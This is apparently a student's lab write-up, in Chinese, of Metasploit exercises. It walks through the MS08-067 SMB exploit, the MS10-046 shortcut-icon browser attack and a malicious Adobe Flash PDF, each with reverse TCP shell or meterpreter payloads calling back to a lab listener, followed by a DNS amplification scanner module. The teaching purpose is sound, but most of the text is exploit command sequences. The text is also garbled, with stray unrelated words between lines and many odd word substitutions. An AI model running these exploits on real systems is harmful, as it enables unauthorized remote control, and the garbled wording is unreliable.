首先利用msfconsole
启用msf终端shell
而后利用search MS08-067
搜索漏洞,会显示相应漏洞模块windows
根据上图,咱们输入use exploit/windows/smb/ms08_067_netapi
,选择相应的模块api
而后咱们可使用show payloads
,查看可使用的模块
浏览器
而后根据上图,为获取靶机的shell,因此利用set payload generic/shell_reverse_tcp
安全
而后输入show options
,查看配置信息,知道咱们须要配置RHOST,LHOST,LPORT,target网络
set RHOST 192.168.241.138 set LHOST 192.168.241.134 set LPORT 5220
进行配置session
而后咱们再次利用show options
,查看配置信息
tcp
而后exploit
进行监听
工具
search ms10_046
查找漏洞因为咱们要对浏览器进行攻击,因此咱们输入use use exploit/windows/browser/ms10_046_shortcut_icon_
学习
而后咱们输入show payloads
,查看载荷进行选择,这里我仍用实验一中的载荷set payload generic/shell_reverse_tcp
咱们利用show options
查询须要配置的有,LPORT,LHOST,SRVHOST
set SRVHOST 192.168.241.134 set LHOST 192.168.241.134 set LPORT 5220
进行配置
而后输入exploit
生成URL,并在windows端访问该URL,kali端如图
输入sessions
,可看到一个ID为1的链接,而后输入session -i 1
,接入ID为1的链接,输入shell
,获取成功。
如图:
首先仍是先利用search adobe
进行搜索
而后进行选择,我选择的是use windows/fileformat/adobe_flashplayer_button
而后set payload windows/meterpreter/reverse_tcp
,设置所用荷载,利用show options查看所要配置的信息
set LHOST 192.168.241.134 set LPORT 5220 set FILENAME 20155220.pdf
exploit
,生成20155220.pdf文件•输入use exploit/multi/handler
,进入监听,并设置监听端口,主机号
惋惜我本次回连并未成功,经反复实验依旧不能成功,缘由不详。
show auxiliary
,查看辅助模块我选择的是scanner/dns/dns_amp,扫描dns
输入show options
,查看配置
输入exploit
进行监听
经过本次实验我对本身的电脑安全产生了很大的怀疑,我有好多补丁由于一些缘由都没有安装,说不定哪天碰巧碰到个没安装相应补丁的漏洞,那只怕个人电脑就凉凉了。本次实验仍是遇到了一些问题,在针对IE浏览器的攻击时出现了挫折,但好在通过不断尝试,放弃了对IE8.0版本的攻击。特别是本次针对客户端攻击的试验中出现了回连不成功的状况,在反复重装了数个xp后,我仍是放弃了这一步,但其中缘由仍是值得深究。随着课程的学习,个人网络安全意识提升了很多,本次至少学到了补丁的及时安装,尽量避免病毒、木马的入侵。